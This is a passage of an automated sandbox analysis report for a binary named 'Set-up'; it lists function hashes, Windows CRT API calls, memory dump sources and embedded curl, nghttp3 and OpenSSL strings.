                          • Opcode Fuzzy Hash: 26aeed6d4ec64ec737a460ff638186a9ee47f8d1b3c97a390bc6d2f11c1fe5eb
                          • Instruction Fuzzy Hash: C1419CB2A083819BC700EF59D48175AB7E9EB85744F59482CE9C8D7240E7B0ED48CBF2
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_ksl_it_get(&it) == stream,nghttp3_qpack.c,000008ED,?,?,?,?,?,?,?,00000000,00000000,00000000,?,00B0EF0E,?), ref: 00B0EA23
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!nghttp3_ksl_it_end(&it),nghttp3_qpack.c,000008EC,?,?,?,?,?,?,?,00000000,00000000,00000000,?,00B0EF0E,?), ref: 00B0EA38
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: !nghttp3_ksl_it_end(&it)$nghttp3_ksl_it_get(&it) == stream$nghttp3_qpack.c
                          • API String ID: 1222420520-1964160224
                          • Opcode ID: 18dcf5a6c679519326058f90caf347be4ce73a24ea440acc6651f482110e02f0
                          • Instruction ID: d506d63ea54a17a27884b43b9c2056631cda9b2b3338c70fed21886cef4661f8
                          • Opcode Fuzzy Hash: 18dcf5a6c679519326058f90caf347be4ce73a24ea440acc6651f482110e02f0
                          • Instruction Fuzzy Hash: 6231A471904309AFD710DE54DC85D9BBBBCFF99354F008959F8985B292E730D944CB92
                          APIs
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00AD2771
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _time64
                          • String ID: Connection time-out$gfff$netascii$set timeouts for state %d; Total % lld, retry %d maxtry %d
                          • API String ID: 1670930206-2395985473
                          • Opcode ID: 5496e8987847803c4d0acd8fcc4010cbbb1e0de8cca0a51d2ffac21ba23a361d
                          • Instruction ID: cd25a1c69243bf28105b52d56f02a0e4117b1c1e84468f9b51459be880fa1cac
                          • Opcode Fuzzy Hash: 5496e8987847803c4d0acd8fcc4010cbbb1e0de8cca0a51d2ffac21ba23a361d
                          • Instruction Fuzzy Hash: 6521F8B1B003005FE724AA29EC05B2779DAEBD4304F18893EF90ACB396E671D800D761
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(veccnt > 0,nghttp3_stream.c,0000033D), ref: 00B06119
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == offset,nghttp3_stream.c,00000349), ref: 00B0612E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: 0 == offset$nghttp3_stream.c$veccnt > 0
                          • API String ID: 1222420520-3888743547
                          • Opcode ID: 56107da40d485bf857ba05b81c59dc8f2a114e5e0f73b3976897c108918fcb46
                          • Instruction ID: bff134e039534252c4877e981b5115d73566f92753e873f26ce22de7058b0c9c
                          • Opcode Fuzzy Hash: 56107da40d485bf857ba05b81c59dc8f2a114e5e0f73b3976897c108918fcb46
                          • Instruction Fuzzy Hash: 133127316443048FC704EF18D8C5A6ABBE4FF88318F0585BCE9895B391E632EE51CB92
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(n <= balloc->blklen,nghttp3_balloc.c,00000042,?,00000000,?,00B04D5A,00000000,?,000001F0), ref: 00B08861
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(((uintptr_t)balloc->buf.last & 0xfu) == 0,nghttp3_balloc.c,00000055,?,000001F0), ref: 00B08873
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: ((uintptr_t)balloc->buf.last & 0xfu) == 0$n <= balloc->blklen$nghttp3_balloc.c
                          • API String ID: 1222420520-3025919285
                          • Opcode ID: 6c0febb89fcb10761297421541485d2caf13026be7bcb753d057d397e65852ff
                          • Instruction ID: 3b38ef26dafdce3f6b78d0abcfcaf86d8e132e2630984c0e414a9abf69d29fe5
                          • Opcode Fuzzy Hash: 6c0febb89fcb10761297421541485d2caf13026be7bcb753d057d397e65852ff
                          • Instruction Fuzzy Hash: 811108B2A00701BBD7109F29EC41955B7A8FF45731B048624F954976C1D731E960DBE6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: application/octet-stream$formdata.c
                          • API String ID: 0-1216067158
                          • Opcode ID: 5582a8b1bc73c8858e251a8cffb1cc5f686c04779f108977ff5b0e3a80655e74
                          • Instruction ID: 338b6d0527f513c88482ad83fcd23ed19392993fc5ce4e4b92bc249f688daf3d
                          • Opcode Fuzzy Hash: 5582a8b1bc73c8858e251a8cffb1cc5f686c04779f108977ff5b0e3a80655e74
                          • Instruction Fuzzy Hash: AB02C7B0E08B408FE7259F24D980727BBF1BF59708F19492DD88A4B792D776E885C742
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00D046DD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlen
                          • String ID: ASN1_mbstring_ncopy$crypto/asn1/a_mbstr.c$maxsize=%ld$minsize=%ld
                          • API String ID: 39653677-2338284442
                          • Opcode ID: 3199b200ac8922bd591daff1e245459003d34779d34fb384426b4e501abd321f
                          • Instruction ID: e2e1d1a70f679e89c127ff0c2c14c9be66c91ab9c40cf49ef01df32b11dc42f0
                          • Opcode Fuzzy Hash: 3199b200ac8922bd591daff1e245459003d34779d34fb384426b4e501abd321f
                          • Instruction Fuzzy Hash: 57A117B5B48301ABD710AA14AC02F5B73E4AB95704F14452CFF8D9B3C2E6B5DC4496B7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: .%lu$crypto/objects/obj_dat.c
                          • API String ID: 0-3322715555
                          • Opcode ID: b3db5ee74e983a48567199f75714c23a6c7ae361fc8f1894f61258fe5e25b279
                          • Instruction ID: 3483fb5f41fcef02a54e391fda1fde4258c837bc87a352fa3bd2ecc8e603d2a5
                          • Opcode Fuzzy Hash: b3db5ee74e983a48567199f75714c23a6c7ae361fc8f1894f61258fe5e25b279
                          • Instruction Fuzzy Hash: 48A106BAA083019BD7109E25C84072BB7E5AFD6746F18882CFC9887241FB70DD8DD796
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A90090
                            • Part of subcall function 00B4F340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,00A900B0,?,?,00000000,00000000,?), ref: 00B4F35D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _time64strlen
                          • String ID: $$Bad file size (%lld)$File already completely downloaded$Offset (%lld) was beyond file size (%lld)
                          • API String ID: 3014104814-979756411
                          • Opcode ID: b5bf1bf30859b82009897dec1ca7fa30fa6e31c93eca6d52c6d13a1f13783c4b
                          • Instruction ID: 6ba068381d14923bdf8a6ba6508c52414a5a8a74bce33240f1a144fbc5765fc5
                          • Opcode Fuzzy Hash: b5bf1bf30859b82009897dec1ca7fa30fa6e31c93eca6d52c6d13a1f13783c4b
                          • Instruction Fuzzy Hash: 8FB1E4B1B083409FDB14DF28C880F6AB7E5AFC9714F14466CF998973A2D771AD058B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: No URL set$User-Agent: %s$cannot mix POSTFIELDS with RESUME_FROM$transfer.c
                          • API String ID: 0-950935550
                          • Opcode ID: 120030de9ac858b0b27865d3c72079dcf8d24a62c49d0ab51822bde200723128
                          • Instruction ID: f87d302fa42f4f3647c8df53d57de569f84207f120435cb6ec6c7de622b199ae
                          • Opcode Fuzzy Hash: 120030de9ac858b0b27865d3c72079dcf8d24a62c49d0ab51822bde200723128
                          • Instruction Fuzzy Hash: C1B10AB1B00A026BE718DB74DC45BA6F7A4BF59315F048329E42C96282FB31B474DBD2
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00BBA37F
                          Strings
                          • QUIC error code: 0x%llx%s%s%s, reason: "%s", xrefs: 00BBA3D5
                          • ossl_quic_channel_raise_protocol_error_loc, xrefs: 00BBA2D9, 00BBA3B0
                          • ssl/quic/quic_channel.c, xrefs: 00BBA2E3, 00BBA3BA
                          • QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s", xrefs: 00BBA310
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlen
                          • String ID: QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s"$QUIC error code: 0x%llx%s%s%s, reason: "%s"$ossl_quic_channel_raise_protocol_error_loc$ssl/quic/quic_channel.c
                          • API String ID: 39653677-1084217658
                          • Opcode ID: 166bc149feb923224acd22691aec4e01cb66bd0695571c376adb8aadaf5b2473
                          • Instruction ID: d4be356be7a85e85a9ab9f8bc999b95a701c500e9006c0194a7f6d18773835b6
                          • Opcode Fuzzy Hash: 166bc149feb923224acd22691aec4e01cb66bd0695571c376adb8aadaf5b2473
                          • Instruction Fuzzy Hash: 5B51D6B1A04349ABCF10DF14DC42EAF7BE5EF88744F044528FE4C97211E631D911ABA2
                          APIs
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00B30E3B,?,?,00000000,?), ref: 00DE63E9
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00B30E3B,?,?,00000000,?), ref: 00DE63FB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _errno
                          • String ID:
                          • API String ID: 2918714741-0
                          • Opcode ID: 63eb4420e788e64806094d3a47b024da34f042056e9385a93d19859911e10ce4
                          • Instruction ID: 8b7d5a828fb7b8dd720c723ac6946c6e471e6465dcd4a97e248bfccfec44f90d
                          • Opcode Fuzzy Hash: 63eb4420e788e64806094d3a47b024da34f042056e9385a93d19859911e10ce4
                          • Instruction Fuzzy Hash: C441C0B1A083519FD700BF6A9881A2F77E9AFA4794F1D443CF889C7241E675EC0487B2
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00C1691C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlen
                          • String ID: err:%lx:%lx:%lx:%lx$error:%08lX:%s:%s:%s$lib(%lu)$reason(%lu)
                          • API String ID: 39653677-804487489
                          • Opcode ID: 926b9faf1bdca9546692a6645b235c4671a1ad3e29b6eccfcd07b935520f8c6b
                          • Instruction ID: 1a20e98eee09d6b413ac2ff47d84a897b4479ac545d768fc2994b67664956294
                          • Opcode Fuzzy Hash: 926b9faf1bdca9546692a6645b235c4671a1ad3e29b6eccfcd07b935520f8c6b
                          • Instruction Fuzzy Hash: BE310BF2A04300ABFB3069569C46BE776DC9B91704F044038FD5C561C2FA76AD94D3A1
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00DAABB9), ref: 00DAA34E
                            • Part of subcall function 00C3E270: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 00C3E28D
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00DAABB9), ref: 00DAA446
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
